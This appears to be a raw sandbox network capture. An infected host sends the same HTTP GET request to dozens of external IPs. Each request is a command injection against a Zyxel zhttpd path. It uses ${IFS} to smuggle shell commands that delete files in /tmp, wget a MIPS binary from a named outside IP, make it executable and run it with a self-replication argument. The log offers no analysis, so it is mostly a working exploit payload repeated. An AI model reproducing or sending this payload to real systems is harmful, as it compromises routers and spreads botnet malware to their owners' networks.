                                                Jan 28, 2024 10:16:39.020927906 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7996192.168.2.2333124167.112.154.213443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.020942926 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7997192.168.2.2336972132.153.247.247443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.020962000 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7998192.168.2.2345050222.16.131.23443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.021012068 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7999192.168.2.233311281.254.32.27443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.021018028 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8000192.168.2.234010661.73.142.93443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.021049023 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8001192.168.2.2339850120.77.95.5443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.021060944 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8002192.168.2.2334938194.108.183.141443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.021125078 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8003192.168.2.234180898.251.168.44443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.021130085 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8004192.168.2.2351884117.148.112.252443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.021142960 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8005192.168.2.23527389.232.244.181443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.021166086 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8006192.168.2.235718664.248.71.133443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.021200895 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8007192.168.2.233864276.115.44.55443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.021218061 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8008192.168.2.2339824170.108.70.218443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.021253109 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8009192.168.2.235693837.215.82.125443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.021275997 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8010192.168.2.234808254.216.31.82443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.021285057 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8011192.168.2.234245023.118.133.14443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.021306992 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8012192.168.2.235925495.244.68.116443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.021343946 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8013192.168.2.233448882.47.207.118443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.021368027 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8014192.168.2.234349853.20.77.242443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.021389008 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8015192.168.2.2355116122.214.146.84443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.021409035 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8016192.168.2.234177441.86.118.155443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.021466970 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8017192.168.2.2345398118.199.218.14443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.021485090 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8018192.168.2.2359146157.8.21.165443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.021492004 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8019192.168.2.2349976163.159.243.35443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.021533966 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8020192.168.2.234379289.41.194.107443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.021537066 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8021192.168.2.234568043.116.170.49443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.021583080 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8022192.168.2.233986248.57.124.116443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.021605968 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8023192.168.2.2354720126.179.74.79443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.021641970 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8024192.168.2.2338416144.221.40.217443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.021652937 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8025192.168.2.2337748192.67.2.199443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.021684885 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8026192.168.2.235238443.130.227.134443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.021708012 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8027192.168.2.2335306170.37.53.128443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.021739960 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8028192.168.2.2350112207.46.159.9443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.021768093 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8029192.168.2.2333014189.121.123.176443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.021797895 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8030192.168.2.2354504121.128.228.246443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.021816969 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8031192.168.2.2360426203.59.198.231443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.021846056 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8032192.168.2.234760665.133.162.209443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.021878004 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8033192.168.2.2349142111.22.57.122443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.021912098 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8034192.168.2.2333792129.24.210.70443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.021941900 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8035192.168.2.234643668.152.178.166443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.021966934 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8036192.168.2.2339646158.114.5.189443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.021985054 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8037192.168.2.2338162171.43.193.76443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.022006989 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8038192.168.2.2358008136.139.146.222443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.022037029 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8039192.168.2.235326493.212.209.188443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.022073984 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8040192.168.2.2341642171.248.142.233443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.022092104 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8041192.168.2.2336764176.240.37.230443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.022121906 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8042192.168.2.234164692.62.211.82443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.022124052 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8043192.168.2.2357526132.10.254.193443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.022176981 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8044192.168.2.2349436212.195.253.95443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.022202015 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8045192.168.2.2359540178.89.91.242443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.022216082 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8046192.168.2.2342072113.243.112.125443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.022231102 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8047192.168.2.2337074130.125.230.248443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.022281885 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8048192.168.2.2345938178.189.154.248443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.022294044 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8049192.168.2.235537017.70.100.225443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.022317886 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8050192.168.2.2344520202.16.246.61443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.022337914 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8051192.168.2.2334798104.5.3.175443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.022367001 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8052192.168.2.233837276.178.74.172443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.022380114 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8053192.168.2.2334760166.220.179.14443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.022382975 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8054192.168.2.2349930180.112.217.112443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.022402048 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8055192.168.2.2360612130.146.86.190443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.022428036 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8056192.168.2.2355640212.196.131.39443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.022475958 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8057192.168.2.2354590102.91.21.78443
                                                TimestampBytes transferredDirectionData
